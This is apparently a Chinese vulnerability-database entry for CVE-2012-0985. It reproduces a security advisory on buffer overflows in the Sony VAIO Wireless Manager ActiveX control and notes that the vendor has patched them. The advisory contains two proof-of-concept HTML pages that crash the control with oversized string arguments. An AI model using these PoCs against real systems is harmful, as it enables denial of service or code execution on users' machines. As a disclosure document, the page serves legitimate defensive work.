Sony VAIO Wireless Manager ActiveX控件缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121172 漏洞类型 缓冲区溢出
发布时间 2012-05-31 更新时间 2012-05-31
CVE编号 CVE-2012-0985 CNNVD-ID CNNVD-201205-543
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/18958
https://www.securityfocus.com/bid/53735
https://cxsecurity.com/issue/WLB-2012050232
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201205-543
|漏洞详情
SonyVAIO是Sony公司生产的一种计算机系统。SonyVAIOWirelessManagerActiveX控件(WifiMan.dll)中存在多个缓冲区溢出漏洞,这些漏洞源于应用程序对用户提供的输入未经充分的边界值校验。攻击者可利用这些漏洞在使用该ActiveX控件(典型如IE)的应用程序上下文中执行任意代码,攻击失败将导致拒绝服务。SonyVAIOWirelessManager4.0.0.0版本中存在这些漏洞,其他版本也可能受到影响。
|漏洞EXP
Advisory ID: HTB23063
Product: Wireless Manager Sony VAIO
Vendor: Sony Computers
Vulnerable Version(s): 4.0.0.0 and probably prior
Tested Version: 4.0.0.0
Vendor Notification: 7 December 2011 
Vendor Patch: 20 January 2012 
Public Disclosure: 30 May 2012 
Vulnerability Type: Buffer Overflow
CVE Reference: CVE-2012-0985
Solution Status: Fixed by Vendor
Risk Level: High 
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered 2 buffer overflow vulnerabilities in Wireless Manager Sony VAIO which can be exploited to execute arbitrary code on vulnerable system.


1) Buffer Overflow in Wireless Manager Sony VAIO: CVE-2012-0985


1.1 The method SetTmpProfileOption() in WifiMan.dll library does not properly check the length of string parameters.

An attacker could craft a malicious HTML page to trigger the vulnerability and execute arbitrary code in the context of the affected user.

The following PoC will crash the application:


<HTML>
<BODY>
<object id=ctrl 
classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>
<SCRIPT>
function Do_()
{
   arg1=1
   arg2=String(8212, "X")
   arg3="defaultV"
   SetTmpProfileOption arg1 ,arg2 ,arg3
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value="Sony_POC">
</BODY>
</HTML>



1.2 The method ConnectToNetwork() in WifiMan.dll library does not properly check the length of string parameters.

An attacker could craft a malicious HTML page to trigger the vulnerability and execute arbitrary code in the context of the affected user.

The following PoC will crash the application:


<HTML>
<BODY>
<object id=ctrl 
classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>
<SCRIPT>
function Do_()
{
   arg1=1
   arg2=String(6164, "X")
   target.ConnectToNetwork arg1 ,arg2
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value="Sony_POC">
</BODY>
</HTML>


-----------------------------------------------------------------------------------------------

Solution:

Sony has released a security update for the Affected Models that resolves this issue. Sony recommends that all customers who have Affected Models immediately install the latest version of the software by using VAIO Update.

Note: If you are using the default VAIO Update settings the update will be installed automatically.

More information and security update:
http://esupport.sony.com/US/perl/support-info.pl?template_id=1&info_id=946

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23063 - https://www.htbridge.com/advisory/HTB23063 - Buffer Overflow in Wireless Manager Sony VAIO.
[2] Wireless Manager Sony VAIO - http://www.sony.co.uk/hub/vaio-laptops - is a software to manage wireless connections that is installed by default on various series of Sony VAIO laptops.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
|受影响的产品
Sony VAIO Wireless Manager 4.0.0.0
|参考资料

来源:XF
名称:vaio-activex-bo(75978)
链接:http://xforce.iss.net/xforce/xfdb/75978
来源:BID
名称:53735
链接:http://www.securityfocus.com/bid/53735
来源:EXPLOIT-DB
名称:18958
链接:http://www.exploit-db.com/exploits/18958
来源:SECUNIA
名称:49340
链接:http://secunia.com/advisories/49340
来源:OSVDB
名称:82401
链接:http://osvdb.org/82401
来源:esupport.sony.com
链接:http://esupport.sony.com/US/perl/support-info.pl?template_id=1&info_id=946
来源:BUGTRAQ
名称:201205302BufferOverflowsinWirelessManagerSonyVAIO
链接:http://archives.neohapsis.com/archives/bugtraq/2012-05/0147.html
来源:NSFOCUS
名称:19725
链接:http://www.nsfocus.net/vulndb/19725